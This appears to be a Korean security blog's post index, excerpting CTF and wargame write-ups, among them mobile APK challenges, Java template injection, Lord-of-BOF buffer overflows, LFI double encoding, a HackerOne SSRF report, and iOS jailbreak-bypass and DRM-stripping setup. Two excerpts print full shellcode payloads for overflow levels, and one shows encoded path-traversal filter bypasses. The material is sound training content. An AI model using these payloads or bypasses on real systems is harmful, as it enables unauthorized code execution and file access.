분류 전체보기70 CTF#1 Hacktivitycon mobile Write-up 게임 풀이니깐 CTF 카테고리 글은 편하게 쓸 예정ㅋ 금요일 퇴근 후, CTF 풀기 도전^-^ 술을 안먹어서 건강도 좋아지고, 실력도 늘 수 있을거라 기대하고 문제풀이 도~전 잡설 각설하고 문제풀이 ㄱ, 라임 오져 인정ㅋ 1. mobile_one 풀이 : APK 디컴파일 후, resource 파일 내 flag 확인 가능; 디컴파일 방지해야하는 이유 APK Decompile Code : https://b3cl4ssy.tistory.com/14?category=852923 2. pinocchio APK 디컴파일 소스코드를 통해 4자리 PIN 입력 시, FlagActivity Class에서 Packet 전송함을 예측할 수 있다. APK 난독화를 빡시게 해야하는 이유 패킷 잡은 후, PIN 4자리 brutefo.. 2020. 8. 2. root-ME#2 Java Server-side Template Injection [ 문제 ] 인증 패스워드파일인 SECRET_FLAG.txt 를 획득하기 위해서 취약점을 Exploit해 Template란? web page, email을 통해 나타나지는 동적인 데이터를 나타내기 위해 사용되는 web app [ 기능 ] 공격자가 삽입 가능한 input data가 output data내 포함 원인은 public class Execute 로 인한 shell 실행 가능 Freemarker template engine 이 외부 command 실행 기능이 있다고 가정했을때, process 생성하고 결과를 output으로 삽입가능하다 위의 template 문구를 갖다 붙여넣으면 바로 실행 가능 +Wappalyzer를 이용하여 Freemarket 환경 정보 획득이 가능하다면 앞으로 시도할.. 2020. 7. 24. LOB#12 darkknight 0. Payload /home/golem/darkknight `python -c "print '\xc8\xfb\xff\xbf'+'\x90'*32+'\xc4\xfb\xff\xbf'+'\x14'+'\x90'*59+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'+'\x90'*75"` 1. 개념 1) 1 byte overflow란? 스택 프레임 안에 ebp 주소 1byte 변조 가능 시, ebp 값이 4byte+shellcode 참조 주소를 가르키도록 하여 shellcode 실행하는 기법이다. 2) core dump란? 프로그램이 비정상 종료 시점에서 프로세스 메모리를 dump.. 2020. 7. 19. LOB#1 gate 0. Payload /home/gate/gremlin `python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"+"\x90"*135+"\xd0\xf8\xff\xbf"+"\x90"*100'` 1. 문제풀이 1) CODE 소스코드 확인 시, 인자값 길이를 확인하지 않음을 알 수 있다. 2)SOLUTION main() 시작점에서 return address, strcpy() 호출 이후 stack 내 userinput 저장 위치를 확인할 수 있다. shellcode 실행을 위해, return address 위치 - userinput 위치를.. 2020. 7. 19. root-me#1 Local File Inclusion - Double encoding 0. 개념 LFI(=Local File Inclusion) ? 조작된 user input을 전송하여 서버 응답 값 내 서버 파일 내용을 포함시키는 취약점입니다. Double encoding란? 글자 그대로 두번 URL encoding된 문자열, Double encoding을 이용하여 공격 구문 필터링 우회 가능합니다~! 예시 ) 서버 다운로드 취약점 필터링으로 상위 폴더 접근 구문인 "../" 적용시의 USER INPUT 에 결과는 아래와 같습니다. 1) URL.decoding(%2e%2e%2f) -> "../" 2) URL.decoding(%252e%252e%252f) -> "%2e%2e%2f" 여기서 2)를 통해 "../" 구문 필터링은 우회 가능합니다. Webserver안에 여러 인코딩 문자열 수용.. 2020. 7. 13. HACKERONE#1 SSRF & Kubelet token [ SSRF를 통한 서버 인스턴스 ROOT 접근 ] https://hackerone.com/reports/341876 $25000 = 30015413.52원 = 3001.5만원 취약 환경 1) Server-Side Template Injection을 통한 SSRF 가능 2) 서버 내 kubelet를 이용, SHELL 실행 token 관련 API 관리 미흡 공격 STEP 1.SSRF를 이용하여 https://exchangemarketplace.com/ Google Cloud Metadata 접근 1) Server-Side Template Injection? 서버에 조작된 요청값 전송 시, template에서 user input을 코드로 Injection하여 서버에서 코드가 실행됨 2) SSRF? 서버에 조.. 2020. 7. 12. iOS Analysis#1 CydiaSubstrate Hooking [ CydiaSubstrate를 이용한 탈옥 우회 앱 분석 ] \ 1. CydiaSubstrate? =code modification platform, hooking하여 Application 로직을 변경하는 라이브러리이다. (iOS 에서 find / -name libsubstrate*를 통해 바이너리 경로 확인가능.) 2. Analyzing Application using CydiaSubstrate(FlyJB) iOS 앱 중 CydiaSubstrate를 이용하여 Hooking시도하는 Application Binary File Logic 확인 시, libsubstrate.dylib 이용하는 것을 확인할 수 있다. libsubstrate 라이브러리 내 CydiaSubstrate 주요 로직들이 존재한다. AP.. 2020. 7. 4. iOS setting for Pentesting#3 Clutch(tampering) We can get a IPA(iOS Appstore Package) file by using Clutch. This program is a tool removing DRM(Digital right Management) of IPA. Let's make it happen. Link to download Clutch https://github.com/KJCracks/Clutch/releases First, Check the Applications installed on my iOS. Make IPA file, Clutch will dump it when DRM removed with option "d". There will be information of loctaion like this. I can ea.. 2020. 6. 12. iOS setting for Pentesting#2 flyjb(jailbreak bypass) I will use the flyjb to bypass jailbreak Let's make it happen 1. After accessing to this page on phone, and click the button https://www.ios-repo-updates.com/repository/xsf1re-s-repo/package/kr.xsf1re.flyjb/ 2. Install Source through cydia, then you can see a new list on the Setting. 3. After sliding the button of application what you want to bypass jailbreak on, you can bypass jailbraek. 2020. 6. 11. 이전 1 ··· 4 5 6 7 8 다음
